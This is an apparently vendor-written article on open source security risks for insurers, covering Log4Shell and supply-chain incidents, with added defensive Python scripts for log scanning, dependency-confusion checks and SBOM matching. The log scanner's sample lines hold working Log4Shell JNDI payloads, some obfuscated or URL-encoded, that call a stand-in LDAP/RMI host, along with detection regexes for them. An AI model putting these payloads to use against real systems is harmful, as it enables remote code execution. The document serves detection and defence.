
Benefits, Risks, and Real-World Attacks Involving Open Source in the Insurance Industry
The insurance sector is undergoing a rapid digital transformation, integrating technologies such as artificial intelligence, big data analytics, blockchain and cloud computing to serve customers better, optimise operations and reduce fraud. Central to this shift is the growing reliance on open source software (OSS): tools, libraries and platforms freely available for development, adaptation and integration. In conversations with C-suite members across all of the key sectors, OSS is recognised as beneficial but also seen as the "elephant in the room": the risks are known, yet a lack of experience in managing this layer means that attacks against it continue to succeed.
While OSS gives insurers flexibility, innovation and cost efficiency, it also introduces serious cybersecurity risks. This article explores how open source is being used in insurance, outlines the real-world consequences of cyber threats involving OSS, and assesses the risk of future attacks as threats grow more sophisticated.
Why Insurers Use Open Source Software
Open source components are now integrated into nearly every stage of the software development lifecycle in the insurance industry. Key benefits include:
- Cost savings: Avoiding high licensing fees of proprietary software.
- Faster development: Leveraging pre-built libraries and frameworks.
- Community support: Tapping into vast global expertise and frequent updates.
- Flexibility: Extending existing open source code to meet business-specific requirements.
Examples include:
- Apache Kafka for real-time data streaming and Apache Airflow for data pipeline orchestration.
- TensorFlow for machine learning in fraud detection.
- PostgreSQL and MongoDB for scalable data storage.
- OpenJDK as a base for Java-based enterprise applications.
Open source software has been used to replace legacy systems. Insurance software providers gain ready-to-use features and report delivering enterprise-grade and SaaS applications 50-60% faster, while avoiding vendor lock-in. They are seizing the opportunity to be part of a sector-specific open source software community to learn, grow and contribute, with the potential to shape the sector's future direction. Some of these ready-to-use features include policy, claim and property management, as well as time tracking. There are also templates for embedded insurance products that integrate seamlessly into customer buying experiences.
This business-led, software-driven transformation helps streamline processes, enhance risk assessment and improve customer service. Cloud-based solutions have made it easier to purchase standalone and embedded insurance products as part of our daily digital experiences. Forgot to buy travel insurance when you booked your ski holiday? Not to worry: the ski rental agency selling lift passes on its mobile web app also lets you buy insurance at checkout. Open source software is helping to drive innovation and specialised offers across sectors, giving sellers and resellers greater access to customers wherever they are in their journey.
Cybersecurity Risks of Open Source within the Insurance Sector
Open source code, while powerful, is not immune to vulnerabilities. Many packages are maintained by volunteers, and although updates and patches are often released quickly, companies struggle to keep pace because they do not know which components they are running and have no process for handling updates. A single unpatched library can serve as a gateway to an entire corporate network, and for insurance companies this can expose sensitive personal, financial and medical data.
Key risks include:
- Direct cyber attacks: Without vulnerability scanning, a known vulnerability in a single open source component on an internet-facing system can give an attacker a foothold from which to reach internal databases.
- Supply chain attacks: A piece of malicious code inserted into a widely used library is automatically pulled into the thousands of downstream applications that depend on it, allowing attackers to compromise a vast number of targets simultaneously.
- License mismanagement and IP risks: Using a component under a licence that is not business-friendly carries a significant risk of being forced to publicly release your own intellectual property, leading to loss of competitive advantage and potential legal action.
- Shadow IT and undocumented OSS use: The unmonitored use of unapproved software, often by developers seeking speed and agility, creates significant security and compliance blind spots, because these tools operate outside corporate governance and receive no security patching or vulnerability tracking.
Notable Cyber Attacks Involving Open Source
1. Log4Shell (CVE-2021-44228) – Apache Log4j
In December 2021, a critical remote code execution vulnerability was disclosed in Log4j 2, a widely used Java logging library.
Impact on insurance: Many insurers run Java-based enterprise systems that bundle Log4j, often several layers deep in their dependency trees, so they were exposed even where no developer had chosen Log4j directly.
Exploitation: An attacker who could get a crafted string into any logged field (a User-Agent header, a username, a search term) could make the application fetch and execute attacker-controlled code through a JNDI lookup. APT groups including Charming Kitten (Iran) and APT41 (China) were linked to active exploitation.
2. SolarWinds Supply Chain Attack
Although not directly OSS-related (the attackers compromised SolarWinds' own build pipeline), this 2020 attack drew attention to third-party code risk in general, including OSS components.
Relevance to insurers: Many insurers use SolarWinds or similar IT management tools, and the incident prompted widespread audits of third-party dependencies across the industry.
3. MOVEit Transfer Exploits (2023)
The Cl0p ransomware gang exploited a zero-day SQL injection vulnerability (CVE-2023-34362) in MOVEit Transfer, a managed file transfer product, affecting dozens of insurance, healthcare and finance companies.
Relation to OSS: MOVEit itself is proprietary, so the flaw was not in open source code. The incident belongs here because it demonstrates the same exposure that OSS dependencies create: a third-party component you did not write, handling your most sensitive data, becomes the entry point.
Victims: Included Genworth Financial, a major life and mortgage insurer.
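The Log4Shell entry above turns on one detail: the attacker's payload is a lookup string such as ${jndi:ldap://host/x} that the application happens to log, and exploit kits obfuscated it with nested lookups like ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...} to slip past naive string matching. The following Python script is an added example, not code from the original article or from the Log4j project: it normalises those obfuscations and then flags JNDI lookup attempts in web access logs. The log lines are constructed for the example and the IP addresses are documentation ranges, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Lines 1-3 carry JNDI
# lookup strings in shapes seen during Log4Shell exploitation; 4-5 are benign.
SAMPLE_LOG_LINES = [
    '203.0.113.9 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    # URL-encoded ${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/o} in the query string
    '203.0.113.9 - - [10/Dec/2021:13:02:44 +0000] "GET /quote?id=%24%7B%24%7B%3A%3A-j%7D'
    '%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F198.51.100.7%3A1099'
    '%2Fo%7D HTTP/1.1" 500 12 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:13:03:00 +0000] "GET /claims/123 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:03:10 +0000] "POST /api/policy HTTP/1.1" 201 64 "-" "python-requests/2.26"',
]

# Rewrites that undo the common Log4j lookup-based obfuscations. Each pattern only
# matches an innermost ${...} (no nested braces), so repeated application resolves
# nested lookups from the inside out.
LOOKUP_REWRITES = [
    # ${lower:X} -> x, ${upper:x} -> X
    (re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE),
     lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()),
    # ${anything:-DEFAULT} -> DEFAULT (default-value syntax, e.g. ${::-j} -> j, ${env:NOPE:-j} -> j)
    (re.compile(r"\$\{[^${}]*:-([^${}]*)\}"), lambda m: m.group(1)),
]

# After normalisation, a JNDI lookup looks like ${jndi:<scheme>:...}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def normalize_lookups(text, max_rounds=20):
    """URL-decode, then strip obfuscating lookups until the string stops changing."""
    text = unquote(text)
    for _ in range(max_rounds):
        rewritten = text
        for pattern, replacement in LOOKUP_REWRITES:
            rewritten = pattern.sub(replacement, rewritten)
        if rewritten == text:
            break
        text = rewritten
    return text


def scan_lines(lines):
    """Return one hit per log line containing a JNDI lookup, with the scheme used."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize_lookups(raw)
        match = JNDI_RE.search(normalized)
        if match:
            hits.append({"line": number, "scheme": match.group(1).lower(),
                         "indicator": normalized[match.start():match.start() + 80]})
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi via {hit['scheme']}: {hit['indicator']}")
```

Run it against real access, application and WAF logs from December 2021 onwards; a hit is almost never benign, and the scheme plus the host inside the indicator tells you where the callback went. Note that the script does not prove exploitation succeeded (outbound LDAP/RMI connections from the application host, or a process spawned by the JVM, confirm that), and that attackers who double-encoded or split payloads across fields will need the normaliser extended.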
Known Named Threat Actors Targeting the Sector
- DarkSide / BlackCat (ALPHV): Ransomware-as-a-Service operations (DarkSide went quiet in 2021; BlackCat is widely assessed as a successor) that frequently use software vulnerabilities, including in OSS, for initial access.
- FIN11 / Cl0p: A financially motivated group and its ransomware brand, known for mass exploitation of file transfer products and for targeting insurance and financial companies.
- APT38 (North Korea): Known for financial theft operations, including targeting SWIFT and related financial systems.
- Lazarus Group: Has targeted healthcare and insurance sectors, possibly for both espionage and financial gain.
Future Threat Landscape: What’s Ahead?
The future risk to insurers from open source-based attacks is growing due to:
- AI-driven vulnerability discovery tools used by threat actors.
- Complex OSS supply chains making traceability and patching harder.
- Open source CI/CD toolchains being exploited (e.g., Jenkins, GitLab CI).
Emerging Concerns:
- Malicious open source packages: Attackers upload poisoned libraries to public repositories such as npm, PyPI or Packagist, or hijack abandoned ones. Example: in 2022 the "ctx" package on PyPI and the "phpass" package on Packagist were taken over and modified to exfiltrate environment variables (and thus credentials) from every machine that installed them.
- Dependency confusion attacks: An attacker publishes a package on the public registry with the same name as an organisation's internal, privately hosted package and a higher version number; build tooling that consults both registries picks the attacker's version.
- Insider threats: Poor OSS governance can lead to the accidental (or deliberate) introduction of vulnerable or backdoored code.
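Dependency confusion is easiest to understand by watching a resolver make the wrong choice. The script below is an added example, not code from the original article or any package manager: it models two package indexes with constructed contents (the "acme-" package names are assumptions for illustration, not real projects) and contrasts the behaviour pip exhibits with --extra-index-url, where all indexes are peers and the highest version wins, against a policy that routes each name to a single authoritative index.

```python
# Constructed package indexes for illustration; names and versions are assumptions.
PRIVATE_INDEX = {
    "acme-claims-core": ["1.4.2"],
    "acme-policy-rating": ["2.0.0", "2.0.1"],
}
PUBLIC_INDEX = {
    "requests": ["2.31.0", "2.32.3"],
    "acme-policy-rating": ["99.0.0"],  # attacker-published squat of the internal name
}


def parse_version(version):
    """Minimal numeric version ordering: '2.0.1' -> (2, 0, 1)."""
    return tuple(int(part) for part in version.split("."))


def resolve_as_peers(name):
    """Mimic an installer with the private repo added as an extra index next to the
    public one: candidates from both are pooled and the highest version wins,
    regardless of where it came from (this is how pip's --extra-index-url behaves)."""
    candidates = [(parse_version(v), v, "private") for v in PRIVATE_INDEX.get(name, [])]
    candidates += [(parse_version(v), v, "public") for v in PUBLIC_INDEX.get(name, [])]
    if not candidates:
        raise LookupError(name)
    _, version, origin = max(candidates)
    return version, origin


def resolve_with_scope(name, internal_prefix="acme-"):
    """Safer policy: a reserved internal prefix is only ever resolved from the private
    index, everything else only from the public one. A squatted public name is then
    never even considered."""
    index, origin = (PRIVATE_INDEX, "private") if name.startswith(internal_prefix) else (PUBLIC_INDEX, "public")
    versions = index.get(name, [])
    if not versions:
        raise LookupError(f"{name} is not available from its authoritative index ({origin})")
    return max(versions, key=parse_version), origin


def confusable_names():
    """Internal names that also exist publicly: exactly the set an attacker needs."""
    return sorted(set(PRIVATE_INDEX) & set(PUBLIC_INDEX))


if __name__ == "__main__":
    for name in ("acme-claims-core", "acme-policy-rating", "requests"):
        print(f"{name:20} peers -> {resolve_as_peers(name)}   scoped -> {resolve_with_scope(name)}")
    print("collisions:", confusable_names())
```

In practice the scoped policy is implemented in the repository manager (a virtual repository that pins internal name patterns to the internal repo), backed by reserving your internal names on the public registry, using hash-pinned lockfiles, and running the equivalent of confusable_names() against your SBOM on every build.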
Mitigation Strategies for Insurers
- Adopt SBOMs (Software Bills of Materials): Maintain a machine-readable inventory of every open source component in use, including transitive dependencies, so that a new advisory can be matched against what you actually run.
- Automated vulnerability scanning: Use tools such as Meterian, WhiteSource (now Mend) or Dependabot to detect known-vulnerable components early, in the pipeline rather than in production.
- Continuous monitoring and patching: Establish DevSecOps pipelines that enforce regular OSS updates and fail builds on unresolved critical findings.
- Zero Trust architectures: Limit lateral movement so that a compromised component cannot reach every internal system.
- Training and awareness: Developers should be trained on secure OSS usage and licence compliance.
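The SBOM and scanning items above are only useful together: the inventory answers "do we run this?" and the advisory feed answers "is it affected?". The script below is an added example, not code from the original article or from any SBOM tool, showing the matching step end to end. It parses a small CycloneDX 1.4 JSON document constructed for a hypothetical claims application, matches each component's package URL against a constructed advisory table, and checks versions against simple range expressions. The two Log4j CVEs are real, but the affected ranges are simplified for illustration; a production feed (OSV, NVD, a vendor database) carries the branch-specific fixed versions.

```python
import json
import re

# Constructed CycloneDX 1.4 SBOM for a hypothetical claims application (not a real inventory).
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
         "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
        {"type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind",
         "version": "2.13.4", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.13.4"},
        {"type": "library", "name": "requests", "version": "2.31.0", "purl": "pkg:pypi/requests@2.31.0"},
        # A second service in the same BOM already upgraded its logger.
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
         "version": "2.17.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
    ],
})

# Constructed advisory table keyed by version-less purl. Ranges are simplified:
# Log4Shell (CVE-2021-44228) was fixed in 2.15.0 and the incomplete-fix follow-up
# (CVE-2021-45046) in 2.16.0; real feeds also list the 2.12.x/2.3.x backport fixes.
ADVISORIES = {
    "pkg:maven/org.apache.logging.log4j/log4j-core": [
        {"id": "CVE-2021-44228", "affected": ">=2.0,<2.15.0"},
        {"id": "CVE-2021-45046", "affected": ">=2.0,<2.16.0"},
    ],
}

OPS = {">=": lambda a, b: a >= b, "<=": lambda a, b: a <= b, "==": lambda a, b: a == b,
       ">": lambda a, b: a > b, "<": lambda a, b: a < b}


def parse_version(version):
    """Numeric components only, pre-release tags after '-' dropped: '2.14.1' -> (2, 14, 1)."""
    return tuple(int(p) for p in re.findall(r"\d+", version.split("-")[0]))


def version_in_range(version, spec):
    """True if version satisfies every comma-separated clause, e.g. '>=2.0,<2.15.0'."""
    value = parse_version(version)
    for clause in spec.split(","):
        match = re.fullmatch(r"(>=|<=|==|>|<)\s*([\w.\-]+)", clause.strip())
        if not match:
            raise ValueError(f"bad range clause: {clause!r}")
        op, bound = match.groups()
        if not OPS[op](value, parse_version(bound)):
            return False
    return True


def find_vulnerable(sbom_json, advisories):
    """Return (purl, advisory id) pairs for SBOM components inside an affected range."""
    findings = []
    for component in json.loads(sbom_json).get("components", []):
        purl = component.get("purl")
        if not purl:
            continue  # components without a purl cannot be matched; report them separately
        base, _, version = purl.partition("@")  # pkg:type/namespace/name@version
        for advisory in advisories.get(base, []):
            if version_in_range(version, advisory["affected"]):
                findings.append((purl, advisory["id"]))
    return findings


if __name__ == "__main__":
    for purl, cve in find_vulnerable(SAMPLE_SBOM, ADVISORIES):
        print(f"VULNERABLE {purl}: {cve}")
```

Two details matter for a real deployment: components that have no purl (common in hand-written or legacy SBOMs) silently drop out of matching and should be listed as unknowns rather than treated as clean, and a purl with qualifiers (a trailing ?...) or a namespace containing an encoded @ needs a proper purl parser rather than the partition used here.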
Conclusion
The open source revolution has undeniably propelled innovation in the insurance industry, but this double-edged sword demands a proactive cybersecurity posture. From high-profile exploits such as Log4Shell to the growing sophistication of supply chain attacks, it is clear that OSS security is no longer optional; it is critical.
Insurers must recognise open source as both an opportunity and a threat. Only through comprehensive risk management, visibility into what they actually run, and cultural change can they unlock its benefits while shielding themselves from cyber catastrophe.
If you’re in insurance, now’s the time to put OSS security on the boardroom agenda.
Get in touch here to see how we can help!
